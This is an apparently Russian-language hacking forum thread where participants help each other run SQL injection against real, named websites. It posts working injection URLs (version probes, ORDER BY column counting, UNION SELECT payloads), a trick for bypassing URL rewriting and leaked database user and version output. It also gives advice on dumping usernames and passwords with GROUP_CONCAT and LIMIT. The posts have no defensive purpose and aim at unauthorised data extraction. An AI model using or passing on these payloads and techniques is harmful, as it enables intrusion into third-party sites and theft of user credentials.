R1dex Опять торопишься. Там слепая скуль на 4 ветке(может и можно вывод найти, особо не копал), комментарий не критично http://ilibrary.ru/text/1320/?p=1+and+substring(version(),1,1)=4 http://ilibrary.ru/text/1320/?p=1))+order+by+25+--+ http://ilibrary.ru/text/1320/?p=1))+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* По результатам запроса, грузит файл отсюда: http://ilibrary.ru/tx2/13/ Возможно и можно что-то вымутить, но мне лень Pashkela ай-я-яй kevmen Я тебя умоляю, пока ненужно давать ответов на вопросы
не поможет, тк там mod_rewrite передает все на файл index.phtml, который как раз в REQUEST_URI заменяет = на точку, применяет urlencode и разбивает его на массив по слешам. =/ чет запоздал с ответом
Да там даже вывод есть: ilibrary_il@localhost:4.0.27-standard-log:ilibrary_ilibrary («ilibrary_il@localhost»)
В общем путём долгих манипуляций удалось понять какие поля уводят цикл обработки содержания в бесконечный цикл и исключить их, этот запрос даёт нормальный вывод:
%23 это ещё один вариант комментария в SQL (#), который у них не фильтруется, кол-во колонок было подобрано с помощью ORDER BY, т.к. одно из 25 полей приводило к бесконечному циклу я сначала во все поля засунул USER и посмотрел где идёт вывод, потом убрал лишние, нашёл поле, которое глючит (24 поле), оставил в нём строку и выставил уважаемым на обозрение...
groundhog да у них ничего не фильтруется, будет работать и +--+ и /*, ты сейчас запутаешь новичков Просто нужно изначально обращение в обход mod_rewrite Тоесть http://ilibrary.ru/text/1320/p.1 = http://ilibrary.ru/text/1320/?p=1 ну и с выводом, конечно молодец, мне терпения не хватило разбираться
А почему %2523 ? %23 же символ решётки.И ещё: почему скобки )),а не (( ? Ведь при запросе вывод такой: )) AND autors.id_a = text_auth.id_a AND texts.id_t = parts.id
Не %2523, а 25%23. Последний столбец 25 и # По поводу скобок внимательно прочитай, что ошибка пишет "неверный синтаксис ВОЗЛЕ ))" тоесть в запросе их нужно закрыть
Блин, ну почему всего этого нету в факе?=( Спасибо огромное всем, кто помог - но вывестти столбцы так и не удалось, access denied (
Я читал,но скобки разве не закрываются в противоположную сторону?(Как обычно) ascii(substring()); Но если комментарий работает,то почему он не может просто исключить эти скобки,т.к. они стоят за моим комментарием ?
А если он закрывает скобки предыдущие,то должно быть ))ID,где ID - какое-то число или символ. ЗЫ:Походу,это выше Вели...
Если ты пытался вывести через INFORMATION_SCHEMA то там 4 ветка и там нет INFORMATION_SCHEMA Database.
HI, Я как-то задавал аналогичный вопрос, но появился еще один. Суть такова: При выводе данных, выводимая информация ограничена, то есть выводится не вся, через лимит выводится гораздо больше. Мне советовали выводить информацию разными способами, один из них: GROUP_CONCAT(name,0x3a,pass)+FROM+table+WHERE+ASCI I(lower(name))=97 то есть вывод юзеров на "a". Перебором я выбрал выбрал нужных юзеров, все ОК. Теперь вопрос: Можно ли сразу вывести данные не через перебор как указано выше? Спасибо!
Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит. name,pass+FROM+table+limit+1,1 В чём вопрос, попробуй переформулировать
привет всем, вопросик стоит примерно так : есть сайт и как я думаю скуля хотя по моему слепая... перебором даже version () запрос выдаёт тарабарщину примерно вот так $bAY9<j* http://www.fcsteaua.ro/felicitari/tag/-embleme+order+by+100000000000000000000000 выводит всё на страничку... встречался ли кто нибудь с подобным явлением? Буду очень признателен если мне помогут. Заранее спасибо.
У меня два вопроса: 1. где тут вывод полей? http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,5,6,7,8,9,10/* 2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27
